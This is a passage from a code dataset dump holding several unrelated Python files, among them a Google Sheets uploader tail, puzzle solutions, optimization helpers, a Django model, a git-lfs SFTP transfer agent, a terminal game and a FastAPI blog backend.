re.compile('team do you work with')\n\tfor i in range(len(values[0])):\n\t\tcolumn = values[1][i]\n\t\tm = column.find('kind of team')\n\t\tn = column.find('which team')\n\t\tif m != -1 or n != -1:\n\t\t\tteam_col = i\n\t\t\tbreak\n\n\n\treturn firstDataCol, role_col, team_col\n\n\ndef appendToSheets(sessionRows, overallRows):\n\n\tSCOPES = 'https://www.googleapis.com/auth/spreadsheets'\n\n\tstore = file.Storage('token.json')\n\tcreds = store.get()\n\tif not creds or creds.invalid:\n\t\tflow = client.flow_from_clientsecrets('credentials.json', SCOPES)\n\t\tcreds = tools.run_flow(flow, store)\n\tservice = build('sheets', 'v4', http=creds.authorize(Http()))\n\n\t# Call the Sheets API\n\tsession_sheet_ID = '1NJogP8QxFWCiyHemt35EFeKNv02nNrBLTeAUiPCNCCM'\n\t\n\tbody = {\n\t\t'values': sessionRows[1:]\n\t}\n\tresult = service.spreadsheets().values().append(\n\t\tspreadsheetId=session_sheet_ID, range=\"A:AA\",\n\t\tvalueInputOption='USER_ENTERED', body=body).execute()\n\n\tprint('{0} cells appended to sessions data sheet.'.format(result \\\n\t\t\t\t\t\t\t\t\t\t .get('updates') \\\n\t\t\t\t\t\t\t\t\t\t .get('updatedCells')))\n\n\toverall_sheet_ID = '1iG09yvrF112PiJkrT1-r24S5lHEDCWl5iy-NgeNLCcA'\n\t\n\tbody = {\n\t\t'values': overallRows[1:]\n\t}\n\tresult = service.spreadsheets().values().append(\n\t\tspreadsheetId=overall_sheet_ID, range=\"A:Z\",\n\t\tvalueInputOption='USER_ENTERED', body=body).execute()\n\n\tprint('{0} cells appended to overall data sheet.'.format(result \\\n\t\t\t\t\t\t\t\t\t\t .get('updates') \\\n\t\t\t\t\t\t\t\t\t\t .get('updatedCells')))\n\nif __name__ == '__main__':\n\tscript, survey, sid, api_key = argv\n\tmain(survey, sid, api_key)\n\t\n\n\n\n\n\n\n","sub_path":"qualtrics_online.py","file_name":"qualtrics_online.py","file_ext":"py","file_size_in_byte":29797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"384333677","text":"import re\n\nwith open('input') as f:\n rules, messages = f.read().split('\\n\\n')\n\nmessages = messages.splitlines()\nrules = [x.split(':') for x in rules.split('\\n')]\nruledict = {k:v[1:].replace('\"', '') for k,v in rules}\n\nPATTERN = re.compile('\\d+')\ndef find_valid_messages(rule):\n rightadj = 0\n for match in re.finditer(PATTERN, rule):\n if '|' not in ruledict[match[0]]:\n rule = rule[:match.start()+rightadj] + ruledict[match[0]] + rule[match.end()+rightadj:]\n rightadj += 
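appendToSheets() above drives the Sheets v4 values.append endpoint twice with near-identical bodies. A compact helper showing the same call; the spreadsheet ID is supplied by the caller, and USER_ENTERED makes Sheets parse numbers and dates instead of storing raw strings:

from googleapiclient.discovery import build

def append_rows(creds, spreadsheet_id, rows, cell_range="A:Z"):
    # rows is a list of lists, e.g. sessionRows[1:] from the snippet.
    service = build('sheets', 'v4', credentials=creds)
    result = service.spreadsheets().values().append(
        spreadsheetId=spreadsheet_id,
        range=cell_range,
        valueInputOption='USER_ENTERED',
        body={'values': rows},
    ).execute()
    return result.get('updates', {}).get('updatedCells')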
len(ruledict[match[0]]) - len(match[0])\n else:\n b1, b2 = ruledict[match[0]].split('|')\n rule1 = rule[:match.start()+rightadj] + b1.strip() + rule[match.end()+rightadj:]\n rule2 = rule[:match.start()+rightadj] + b2.strip() + rule[match.end()+rightadj:]\n yield from find_valid_messages(rule1)\n yield from find_valid_messages(rule2)\n break\n else:\n if rule.replace(' ', '').isalpha():\n yield rule\n else:\n yield from find_valid_messages(rule)\n\nvalid_42 = set()\nvalid_31 = set()\nfor message in find_valid_messages('42'):\n valid_42.add(message.replace(' ', ''))\n\nfor message in find_valid_messages('31'):\n valid_31.add(message.replace(' ', ''))\n\n# 0: 8 11\n# 8: 42 | 42 8\n# 11: 42 31 | 42 11 31\n# 42 and 31 are both length 8\n# intersection of 42 and 31 is empty\n# highest length message is 96\n# possible sequences:\n# 1-10 42s + 42 31\n# 1-8 42s + 42 42 31 31\n# 1-6 42s + 42 42 42 31 31 31\n# 1-4 42s + 42 42 42 42 31 31 31 31\n# 1-2 42s + 42 42 42 42 42 31 31 31 31 31\n\nvalid_messages = []\nfor i in range(1, 11):\n start = []\n start.extend([42]*i)\n for j in range(1, 6):\n full = start[:]\n full.extend([42]*j)\n full.extend([31]*j)\n if len(full) <= 12:\n valid_messages.append(full)\n\ntotal = 0\nfor x in messages:\n parsed_message = []\n message = [x[i:i+8] for i in range(0, len(x), 8)]\n for block in message:\n if block in valid_42:\n parsed_message.append(42)\n elif block in valid_31:\n parsed_message.append(31)\n else: break\n else:\n if parsed_message in valid_messages:\n total += 1\n\nprint(total)","sub_path":"day 19/19-2.py","file_name":"19-2.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"314253670","text":"import decimal\nfrom sympy import *\nimport math\nimport numpy\n\ndef getDelta(a, b):\n delta = 0\n for (lh, rh) in zip(a, b):\n delta += (lh - rh)**2\n return delta\n\ndef FirstOrderEquasion(f, a, i):\n d = D(0.00000001)\n c = a.copy()\n c[i] += d\n return (f(c) - f(a))/d\n\ndef SecondOrderEquasion(f, a, i):\n d = D(0.000000001)\n c = a.copy()\n c[i] += d\n x1 = D(f(c))\n c[i] -= 2*d\n x2 = D(f(c))\n c[i] += d\n x3 = D(f(c))\n return (x1 - 2*x3 + x2)/(d**2)\n\ndef deltaArgs(a, b):\n sum = 0\n for i in range(len(a)):\n sum += (a[i]-b[i])**2\n return sum\n\ndef inner(a, b):\n sum = D(0)\n for (x, y) in zip(a, b):\n sum += x * y\n return sum\n\ndef sqGrad(f, a):\n sum = D(0)\n for i in range(len(a)):\n sum += FirstOrderEquasion(f, a, i)**2\n return sum\n\ndef getGrad(f, a): \n argsPD = a.copy()\n for i in range(len(argsPD)):\n argsPD[i] = FirstOrderEquasion(f, argsPD, i)\n return argsPD\n\ndef goldenSectionForSteepestDespect(f, a, b, e):\n x1 = a + (b - a) * decimal.Decimal(0.381966)\n x2 = a + (b - a) * decimal.Decimal(0.618034)\n f1 = f(x1)\n f2 = f(x2)\n delta = getDelta(a, b)\n while sqrt(delta) > e:\n if f1 < f2:\n b = x2\n x2 = x1\n f2 = f1\n x1 = a + (b - a) * decimal.Decimal(0.381966)\n f1 = f(x1)\n else:\n a = x1\n x1 = x2\n f1 = f2\n x2 = a + (b - a) * decimal.Decimal(0.618034)\n f2 = f(x2)\n delta = getDelta(a, b)\n return (a + b) / D(2)\n\ndef goldenSectionForConjugateGradient(f, a, b, eps):\n a1 = D(0)\n b1 = D(1e5)\n x0 = a1 + D(0.5) * (D(3) - D(math.sqrt(5))) * (b1 - a1)\n x1 = b1 - x0 + a1\n while math.fabs(b1 - a1) > D(eps):\n l = a + x0 * b\n r = a + x1 * b\n if f(l) < f(r):\n b1 = x1\n else:\n a1 = x0\n x1 = x0\n x0 = b1 + a1 - x1\n return (a1 + b1)/D(2)\n\ndef findM(f, a1, b1, e):\n a = D(-1e3)\n b = D(1e3)\n while math.fabs(b - a) > e:\n y1 = f(a1 + a 
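The comment block in 19-2.py enumerates every legal 42/31 sequence, but the grammar it describes (0: 8 11, 8: one or more 42s, 11: 42^k 31^k) reduces to a single shape test: m 42-blocks followed by n 31-blocks with m > n >= 1. A direct check, ignoring the input-specific 12-block cap derived from the 96-character messages:

def matches_rule_zero(blocks):
    # blocks is a list of 42/31 labels, e.g. [42, 42, 31].
    n31 = 0
    while blocks and blocks[-1] == 31:
        blocks = blocks[:-1]
        n31 += 1
    return n31 >= 1 and len(blocks) > n31 and all(b == 42 for b in blocks)

print(matches_rule_zero([42, 42, 31]))  # True
print(matches_rule_zero([42, 31, 31]))  # False: needs more 42s than 31s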
* b1)\n y2 = f(a1 + b * b1)\n c = (a + b) / 2\n if y1 < y2:\n b = c\n else:\n a = c\n return (a + b) / 2\n\ndef updateVertex(vertex, a, b):\n vertex[0].append(b[0])\n vertex[0].append(a[0])\n vertex[1].append(b[1])\n vertex[1].append(a[1])\n\ndef D(x):\n return decimal.Decimal(x)","sub_path":"lab2/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"473905209","text":"from django.db import models\n\n# from .services.create_update_delete import create_row_w_validated_params\n# from .services.create_update_delete import update_row_w_validated_params\n# from .services.create_update_delete import delete_row_w_validated_params\n#\n# from .services.read import get_serialized_rows_by_id\n\n\nclass TestEnrollmentStep1(models.Model):\n consumer = models.ForeignKey('PICConsumer', on_delete=models.CASCADE)\n navigator = models.ForeignKey('Navigators', on_delete=models.CASCADE)\n cm_client = models.ForeignKey('CaseManagementClient', on_delete=models.CASCADE)\n cm_sequence = models.ForeignKey('CMSequences', on_delete=models.CASCADE)\n\n notes = models.TextField(blank=True, null=True)\n tracking_no = models.CharField(max_length=500, blank=True, null=True)\n user_name = models.CharField(max_length=500, blank=True, null=True)\n datetime_completed = models.DateTimeField(blank=True, null=True)\n\n date_created = models.DateTimeField(blank=True, auto_now_add=True, null=True)\n date_modified = models.DateTimeField(auto_now=True)\n\n class Meta:\n # maps model to the picmodels module\n app_label = 'picmodels'\n rest_url = 'test_enrollment_step_1'\n\n def return_values_dict(self):\n values_dict = {\n \"consumer\": self.consumer.id if self.consumer else None,\n \"navigator\": self.navigator.id if self.navigator else None,\n \"cm_client\": self.cm_client.id if self.cm_client else None,\n \"cm_sequence\": self.cm_sequence.id if self.cm_sequence else None,\n\n \"notes\": self.notes,\n \"tracking_no\": self.tracking_no,\n \"user_name\": self.user_name,\n \"datetime_completed\": self.datetime_completed.isoformat() if self.datetime_completed else None,\n\n \"date_created\": self.date_created.isoformat() if self.date_created else None,\n \"date_modified\": self.date_modified.isoformat() if self.date_modified else None,\n\n \"id\": self.id\n }\n\n return values_dict\n# TestEnrollmentStep.create_row_w_validated_params = classmethod(create_row_w_validated_params)\n# TestEnrollmentStep.update_row_w_validated_params = classmethod(update_row_w_validated_params)\n# TestEnrollmentStep.delete_row_w_validated_params = classmethod(delete_row_w_validated_params)\n# TestEnrollmentStep.get_serialized_rows_by_id = classmethod(get_serialized_rows_by_id)\n","sub_path":"picmodels/models/care_advisors/case_management_models/steps_for_sequences_models/tables_for_individual_steps_models/test_enrollment_step_1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"15389121","text":"# get the equation for a Gaussian from the solutions to part I\n\n# uncomment this line if you need to\n#from __future__ import division # make division act like python3 even if 2.7\nimport numpy.random as npr\nimport numpy as np\n\nsigma=1.\nthrows=100 # play with this number -- how many darts are enough?\n\n# throw darts in box circumscribing portion of Gaussian of interest\n# width is from -sigma to 
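helpers.py above carries two golden-section variants built on Decimal vectors; the underlying 1-D method is easier to see in floats. A scalar sketch using the same 0.381966 / 0.618034 section constants (the test function is illustrative):

def golden_section_min(f, a, b, eps=1e-8):
    x1 = a + 0.381966 * (b - a)
    x2 = a + 0.618034 * (b - a)
    f1, f2 = f(x1), f(x2)
    while (b - a) > eps:
        if f1 < f2:                      # minimum lies in [a, x2]
            b, x2, f2 = x2, x1, f1
            x1 = a + 0.381966 * (b - a)
            f1 = f(x1)
        else:                            # minimum lies in [x1, b]
            a, x1, f1 = x1, x2, f2
            x2 = a + 0.618034 * (b - a)
            f2 = f(x2)
    return 0.5 * (a + b)

print(golden_section_min(lambda x: (x - 2.0) ** 2, 0.0, 5.0))  # ~2.0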
+sigma\nxvals=(npr.random(throws) * 2.*sigma - 1.*sigma)\n# height is from 0 to peak value of Gaussian\nyvals=(npr.random(throws) / (sigma*np.sqrt(2.*3.14159)))\n\n# determine boundary of region as a function of x values\ngaussfunct= np.exp((-1.*xvals**2)/(2.*sigma**2))/(sigma*np.sqrt(2.*3.14159))\n\n# identify hits\nhits=np.size(np.where(yvals <= gaussfunct))\n\n# use equation area = (hits/throws) * rectangle area\n#rectarea = ?? # fill in based on equations above\n#area = (hits/throws)*rectarea # integer division here, watch out!\n\n#print(\"area is %s\" % area)\n","sub_path":"MonteCarloTutorial/partII_2.py","file_name":"partII_2.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"56690354","text":"import random\nimport numpy as np\nimport scipy\nclass network:\n\tdef __init__(self,inp_list):\n\t\tself.we=[]\n\t\tself.inp=inp_list\n\t\t###weight\n\t\tfor i in range(len(inp_list)-1):\n\t\t\tw=np.random.normal(0.0,1.0,(inp_list[i+1],inp_list[i]))\n\t\t\tself.we.append(w)\n\t\t\n\t\t###activation function###\n\t\tself.lr=100\n\t\t\n\tdef sigmoid(self,z):\n\t\treturn (1/(1+np.exp(-z)))\n\t\n\t#######query part#######\n\tdef predict(self,input):\n\t\tfin_list=[]\n\t\tip_val=np.array(input)\n\t\tval=np.reshape(ip_val,(self.inp[0],1))\n\t\tfor i in range(len(self.we)):\n\t\t\tfin_list.append(val)\n\t\t\tz=np.dot(self.we[i],val)\n\t\t\ta=self.sigmoid(z)\n\t\t\tval=a\n\t\tfin_list.append(val)\n\t\tresult=list(fin_list[-1])\n\t\tret=result.index(max(result))\n\t\treturn ret\n\t\t\n\tdef mutation(self,rate):\n\t\tfor j in range(len(self.we)):\n\t\t\ti=self.we[j]\n\t\t\tpoint_size=i.shape[0]*i.shape[1]\n\t\t\tnum_of_mutation=int(rate*point_size)\n\t\t\t\n\t\t\tfor _ in range(num_of_mutation):\n\t\t\t\trow=random.choice(range(i.shape[0]))\n\t\t\t\tcol=random.choice(range(i.shape[1]))\n\t\t\t\tif random.random()>0.35:\n\t\t\t\t\tself.we[j][row][col]+=1/self.lr\n\t\t\t\telse:\n\t\t\t\t\tself.we[j][row][col]-=1/self.lr\n","sub_path":"Neuro-Evolutionary model/SNAKE GAME/ann.py","file_name":"ann.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"535193209","text":"def solve(x, r, c):\n total = r * c\n\n if total % x != 0:\n return True\n\n #if total / x > 1:\n # return False\n\n if x <= 2 and total >= 2:\n return False\n\n if x > 2 and min(r, c) < 2:\n return True\n\n if x > max(r, c):\n return True\n\n return False\n\n\n\n#print(solve(2, 2, 2))\n#print(solve(2, 1, 3))\n#print(solve(4, 4, 1))\n#print(solve(3, 2, 3))\n\n#print(solve(3, 2, 2))\n\nif __name__ == '__main__':\n f = open('input.txt')\n T = int(next(f))\n count = 0\n for line in f:\n count += 1\n x, r, c = [int(d) for d in line.split()]\n result = solve(x, r, c) and 'RICHARD' or 'GABRIEL'\n #print(x ,r ,c)\n print('Case #{}: {}'.format(count, result))\n\n\n","sub_path":"quali/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"157492715","text":"import json\nimport os\nimport sys\nimport tempfile\nfrom argparse import ArgumentParser\nfrom getpass import getuser\nfrom logging import getLogger\nfrom os.path import expanduser\nfrom time import sleep\nfrom random import random\n\nfrom . 
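partII_2.py above leaves the final hit-or-miss step as an exercise (rectarea = ??). A completed sketch: the bounding box spans [-sigma, sigma] in x and [0, peak] in y, so its area is 2*sigma * 1/(sigma*sqrt(2*pi)), and the integral estimate is (hits/throws) * rectarea; the throw count here is raised for a steadier answer:

import numpy as np
import numpy.random as npr

sigma, throws = 1.0, 100000
xvals = npr.random(throws) * 2.0 * sigma - sigma
yvals = npr.random(throws) / (sigma * np.sqrt(2.0 * np.pi))
gauss = np.exp(-xvals**2 / (2.0 * sigma**2)) / (sigma * np.sqrt(2.0 * np.pi))
hits = np.count_nonzero(yvals <= gauss)
rectarea = 2.0 * sigma / (sigma * np.sqrt(2.0 * np.pi))
print((hits / throws) * rectarea)  # ~0.683, the +/-1 sigma mass of a Gaussian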
import CustomTransferAgent\nfrom .sftp_auth import SftpAuth\nfrom .util import ERROR_CODE, handle_error\n\nlogger = getLogger(__name__)\n\n\nclass SftpAgent(CustomTransferAgent):\n\n def __init__(self, user, hostname, port, rsa_key, remote_dir, temp_dir):\n self.user = user\n self.hostname = hostname\n self.port = port\n self.rsa_key = rsa_key\n self.remote_dir = remote_dir\n self.temp_dir = temp_dir\n logger.info(\"Wait a little to avoid pipe broken\")\n sleep(random())\n logger.info(\"SftpAgent is initialized\")\n\n def init(self, event, operation, remote, concurrent, concurrenttransfers):\n logger.info(\"Enter Start stage\")\n yield \"{}\"\n logger.info(\"Exit Start stage\")\n\n def upload(self, event, oid, size, path, action):\n logger.info(\"Enter Upload stage\")\n with SftpAuth(self.user, self.hostname, self.port, self.rsa_key, self.remote_dir) as sftp:\n progress = self.Progress(oid)\n try:\n sftp.chdir(oid[0:2])\n except IOError:\n sftp.mkdir(oid[0:2])\n sftp.chdir(oid[0:2])\n except Exception as e:\n handle_error(e, ERROR_CODE.UPLOAD)\n try:\n sftp.chdir(oid[2:4])\n except IOError as e:\n sftp.mkdir(oid[2:4])\n sftp.chdir(oid[2:4])\n except Exception as e:\n handle_error(e, ERROR_CODE.UPLOAD)\n\n same_file_exists = False\n try:\n logger.info(\"Check existence of the same file.\")\n target_size = sftp.stat(oid).st_size\n if size == target_size:\n same_file_exists = True\n logger.info(\"A same file exists. Skip upload.\")\n res = json.dumps({\n \"event\": \"progress\",\n \"oid\": oid,\n \"byteSoFar\": size,\n \"bytesSinceLast\": 0\n })\n logger.debug(res)\n print(res, flush=True)\n else:\n logger.info(\"A same file doesn't exist (size). Start upload.\")\n except:\n logger.info(\"A same file doesn't exist (name). Start upload.\")\n try:\n if not same_file_exists:\n sftp.put(path, oid, callback=progress.progress_callback)\n except Exception as e:\n handle_error(e, ERROR_CODE.UPLOAD)\n yield json.dumps({\n \"event\": \"complete\",\n \"oid\": oid,\n })\n logger.info(\"Exit Upload stage\")\n\n def download(self, event, oid, size, action):\n logger.info(\"Enter Download stage\")\n with SftpAuth(self.user, self.hostname, self.port, self.rsa_key, self.remote_dir) as sftp:\n progress = self.Progress(oid)\n temp_path = os.path.join(self.temp_dir, oid)\n logger.info(f\"temp path is {temp_path}\")\n try:\n sftp.chdir(oid[0:2])\n sftp.chdir(oid[2:4])\n sftp.get(oid, temp_path, callback=progress.progress_callback)\n yield json.dumps({\n \"event\": \"complete\",\n \"oid\": oid,\n \"path\": temp_path\n })\n except Exception as e:\n handle_error(e, ERROR_CODE.DOWNLOAD)\n logger.info(\"Exit Download stage\")\n\n def terminate(self):\n logger.info(\"Enter Terminate stage\")\n logger.info(\"Exit Terminate stage\")\n yield '{\"event\": \"terminate\"}'\n\n class Progress:\n byte_so_far = 0\n oid = None\n i = 0.0\n\n def __init__(self, oid):\n logger.info(\"Progress is initialized\")\n self.oid = oid\n\n def progress_callback(self, byte_so_far, size):\n if byte_so_far / size < self.i:\n return\n self.i += 0.1\n bytes_since_last = byte_so_far - self.byte_so_far\n self.byte_so_far = byte_so_far\n res = json.dumps({\n \"event\": \"progress\",\n \"oid\": self.oid,\n \"byteSoFar\": byte_so_far,\n \"bytesSinceLast\": bytes_since_last,\n })\n logger.debug(res)\n print(res, flush=True) # Tried, but couldn't return by yield in a callback.\n\n\ndef main_proc(user=None, hostname=None, port=None, rsa_key=None, remote_dir=None, temp_dir = None):\n logger.info(\"Enter main process\")\n logger.info(\"Wait for std 
input\")\n for line in sys.stdin:\n sftp_agent = SftpAgent(user, hostname, port, rsa_key, remote_dir, temp_dir)\n generator_dispatcher = {\n \"init\": lambda k: sftp_agent.init(**k),\n \"upload\": lambda k: sftp_agent.upload(**k),\n \"download\": lambda k: sftp_agent.download(**k),\n \"terminate\": lambda _: sftp_agent.terminate(),\n }\n logger.debug(line)\n try:\n data = json.loads(line)\n except Exception as e:\n logger.debug(e)\n continue\n for res in generator_dispatcher[data[\"event\"]](data):\n logger.debug(res)\n print(res, flush=True)\n logger.info(\"EOF\")\n res = next(generator_dispatcher[\"terminate\"](None))\n logger.debug(res)\n print(res, flush=True)\n\n\ndef parse_args():\n p = ArgumentParser()\n p.add_argument(\"--user\",\n default=getuser(),\n help=\"username for sftp server.\")\n p.add_argument(\"--hostname\",\n default=\"localhost\",\n help=\"hostname or ip address of sftp server.\")\n p.add_argument(\"--port\",\n default=22,\n help=\"port of sftp server.\")\n p.add_argument(\"--rsa-key\",\n default=expanduser(\"~\") + \"/.ssh/id_rsa\",\n help=\"rsa key path.\")\n p.add_argument(\"--remote-dir\",\n default=\"~/.lfs-miscellaneous\",\n help=\"absolute path of lfs objects directory. \"\n \"In Windows OS, \"\n \"in order to avoid unintentional path expansion by git-lfs \"\n \"Please add 'pyelfs://'. e.g. pyelfs:///home/user/lfs-objects\")\n p.add_argument(\"--temp-dir\",\n help=\"path of temporary directory to download lfs objects.\")\n p.add_argument(\"--debug-log\",\n help=\"debug log file.\")\n return p.parse_args()\n\n\ndef main():\n import logging\n a = parse_args()\n if a.debug_log:\n logging.basicConfig(level=logging.DEBUG, filename=a.debug_log)\n logger.info(f\"Arguments were parsed. : {str(a)}\")\n try:\n if a.temp_dir:\n a.temp_dir = os.path.sep.join(str(a.temp_dir).split(\"/\"))\n else:\n a.temp_dir = tempfile.gettempdir()\n\n if a.remote_dir.startswith(\"pyelfs://\"):\n a.remote_dir = str(a.remote_dir).replace(\"pyelfs://\", \"\")\n except Exception as e:\n logger.info(e)\n raise\n logger.info(f\"Modifid arguments. 
: {str(a)}\")\n main_proc(user=a.user,\n hostname=a.hostname,\n port=a.port,\n rsa_key=a.rsa_key,\n remote_dir=a.remote_dir,\n temp_dir = a.temp_dir)\n","sub_path":"pyelfs/sftp_agent.py","file_name":"sftp_agent.py","file_ext":"py","file_size_in_byte":7534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"496216556","text":"import os\nfrom os import system,name\nclass dragon:\n\n def __init__(self,x,y,screen):\n self.__x=x\n self.__y=y\n self.__lives=5\n self.__lst1=[]\n self.__lst2=[]\n self.__screen=screen\n def printdragon(self,screen):\n fd=open('dragon.txt')\n xx=self.__x\n yy=self.__y\n for i in fd:\n #print(i)\n i=i.rstrip()\n for ch in i:\n self.__screen[xx][yy]=ch\n #print(xx,yy)\n yy=yy+1\n yy=self.__y\n #print()\n xx=xx+1\n \n\n def movedragon(self,x,screen):\n xx=self.__x\n yy=self.__y\n fd=open('dragon.txt')\n for i in fd:\n #print(i)\n i=i.rstrip()\n for ch in i:\n self.__screen[xx][yy]=' '\n #print(xx,yy)\n yy=yy+1\n yy=self.__y\n #print()\n xx=xx+1\n xx=self.__x\n yy=self.__y\n if self.__x > x and self.__x >3 :\n self.__x=self.__x-2\n for j in range(40):\n self.__screen[xx+12][yy+j]=' '\n for j in range(40):\n self.__screen[xx+13][yy+j]=' '\n\n if self.__x < x and self.__x <33:\n self.__x=self.__x+2\n for j in range(40):\n self.__screen[xx][yy+j]=' '\n for j in range(40):\n self.__screen[xx+1][yy+j]=' '\n\n def get_lives(self):\n return self.__lives\n def createbullet(self,player_obj):\n xx=self.__x\n yy=self.__y\n self.__lst1.append(player_obj.get_xpos())\n self.__lst2.append(yy-2)\n self.__lst1.append(xx+10)\n \n self.__lst2.append(yy-2)\n \n def movebullets(self,screen,player_obj):\n n=len(self.__lst2)\n for i in range(n):\n self.__lst2[i]=self.__lst2[i]-2\n y=self.__lst2[i]\n if y>794 and y<1000:\n if ( self.__screen[self.__lst1[i]][y+2]==':'):\n self.__screen[self.__lst1[i]][y+2]=' '\n if(self.__screen[self.__lst1[i]][y]=='#'):\n player_obj.kill()\n self.__lst2[i]=0\n elif(self.__screen[self.__lst1[i]][y-1]=='#'):\n player_obj.kill()\n self.__lst2[i]=0\n self.__screen[self.__lst1[i]][self.__lst2[i]]=':' \n def kill(self):\n self.__lives=self.__lives-1\n if self.__lives==0:\n os.system('clear')\n print('YOU WIN')\n quit()\n\n","sub_path":"dragon.py","file_name":"dragon.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"648700297","text":"import json\nimport os\nimport threading\nimport time\nimport hashlib\nimport base64\nimport io\n\nimport uvicorn\nimport markdown\nfrom fastapi import Cookie, FastAPI\nfrom pydantic import BaseModel\nfrom fastapi import File, UploadFile\nfrom starlette.responses import JSONResponse, StreamingResponse\n\nimport confirmCode\nimport session\nfrom pyDatabase import database\n\nsortItems = \"Python C++ Javascript Algorithm ProgrammingLife\".split(\" \")\n\napp = FastAPI()\nBASEDIR = os.path.dirname(__file__)\ndb = database.Database(os.path.join(BASEDIR, \"db.sqlite3\"))\nsession.init(db)\ncodes = {}\n\n\ndef datasToArr(blogs):\n datas = []\n for blog in blogs:\n datas.append({\n \"title\": blog.title,\n \"id\": blog.id,\n \"user\": db.get(\"user\",id=blog.user).nickname,\n \"date\": blog.date,\n \"tag\": sortItems[blog.tag],\n \"good\":len(db.filter(\"blogGood\",blogId=blog.id))\n })\n return datas\n\ndef sessionDataTimeSet(response):\n pass\n \n\n@app.get(\"/sortItems\")\nasync def getSortItemsApi():\n return {\n \"message\": \"success\",\n \"sortItems\": sortItems\n }\n\n\nclass 
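sftp_agent.py above implements the git-lfs custom-transfer protocol: one JSON event per stdin line, one JSON reply per stdout line. A stripped-down skeleton of that loop; the event names and reply shapes mirror the snippet, not the full git-lfs specification, and the two handlers are caller-supplied:

import json
import sys

def serve(handle_upload, handle_download):
    for line in sys.stdin:
        event = json.loads(line)
        kind = event.get("event")
        if kind == "init":
            reply = {}
        elif kind == "upload":
            reply = handle_upload(event)    # {"event": "complete", "oid": ...}
        elif kind == "download":
            reply = handle_download(event)  # ... plus a local "path"
        elif kind == "terminate":
            print(json.dumps({"event": "terminate"}), flush=True)
            break
        else:
            continue
        print(json.dumps(reply), flush=True)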
postNewBlogArg(BaseModel):\n tag: int\n inner: str\n title: str\n\n\n@app.post(\"/blog/new\")\nasync def postNewBlogApi(item: postNewBlogArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n if len(db.filter(\"blog\", title=item.title, user=user)) != 0:\n return {\"message\": \"repeat\"}\n else:\n date = time.strftime(\"%Y-%m-%d\")\n currentTime = int(time.time())\n db.create(\"blog\", tag=item.tag, inner=item.inner, user=user,\n date=date, goodNum=0, title=item.title,htmlInner=\"\")\n return {\"message\": \"success\"}\n\n\nclass postEditBlogApi(BaseModel):\n title: str\n inner: str\n htmlInner:str\n\n\n@app.post(\"/blog/edit\")\nasync def postEditBlogApi(item: postEditBlogApi, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n blogs = db.filter(\"blog\", title=item.title, user=user)\n if len(blogs) == 1:\n blog = blogs[0]\n date = time.strftime(\"%Y-%m-%d\")\n currentTime = int(time.time())\n blog.date = date\n blog.inner = item.inner\n blog.htmlInner=item.htmlInner\n blog.save()\n else:\n return {'message': \"none\"}\n return {\"message\": \"success\"}\n\n\nclass postNewGoodArg(BaseModel):\n id: int\n\n\n@app.post(\"/blog/good\")\nasync def postNewGoodApi(item: postNewGoodArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n pls = db.filter(\"pl\", id=item.id)\n if len(pls) == 1:\n pl = pls.first()\n if user == pl.userId:\n return {\n \"message\": \"self\"\n }\n\n if len(db.filter(\"good\", plId=item.id,userId=user)) != 0:\n db.remove(\"good\",plId=item.id,userId=user)\n else:\n db.create(\"good\", plId=item.id, userId=user)\n\n return {\"message\": \"success\"}\n\nclass postNewBlogGoodArg(BaseModel):\n id:int\n@app.post(\"/blog/blogGood\")\nasync def postNewBlogGoodApi(item:postNewBlogGoodArg,sessionId=Cookie(None)):\n s=session.getSession(sessionId)\n if s:\n user=db.get(\"user\",id=s['userId'])\n else:\n return {\"message\":\"no signIn\"}\n blogs=db.filter(\"blog\",id=item.id)\n if len(blogs)==1:\n blog=blogs[0]\n goods=db.filter(\"blogGood\",blogId=item.id,userId=user.id)\n if len(goods)==1:\n goods[0].delete()\n blog.goodNum-=1\n blog.save()\n else:\n db.create(\"blogGood\",blogId=item.id,userId=user.id)\n blog.goodNum+=1\n blog.save()\n return {\"message\":\"success\"}\n else:\n return {\"message\":\"none\"}\n\n\nclass postNewPlArg(BaseModel):\n inner: str\n blog: int\n\n\n@app.post(\"/blog/pl\")\nasync def postNewPlApi(item: postNewPlArg, sessionId=Cookie(None)):\n s = session.getSession(sessionId)\n if s:\n user = s['userId']\n else:\n return {\"message\": \"no signIn\"}\n date = time.strftime(\"%Y-%m-%d\")\n db.create(\"pl\", userId=user, blogId=item.blog,\n inner=item.inner, date=date)\n return {\"message\": \"success\"}\n\n\nclass postSignUpArg(BaseModel):\n username: str\n nickname: str\n password: str\n code: str\n\n\n@app.post(\"/user/signUp\")\nasync def postSignUpApi(item: postSignUpArg, sessionId=Cookie(None)):\n c = codes.get(item.username, None)\n if not c or item.code.lower() != c.lower():\n return {\"message\": \"code wrong\"}\n else:\n codes.pop(item.username)\n if sessionId and session.getSession(sessionId):\n return {\"message\": \"loginned\"}\n if len(db.filter(\"user\", username=item.username)) != 0:\n return {\"message\": \"username repeat\"}\n db.create(\"user\", username=item.username,\n 
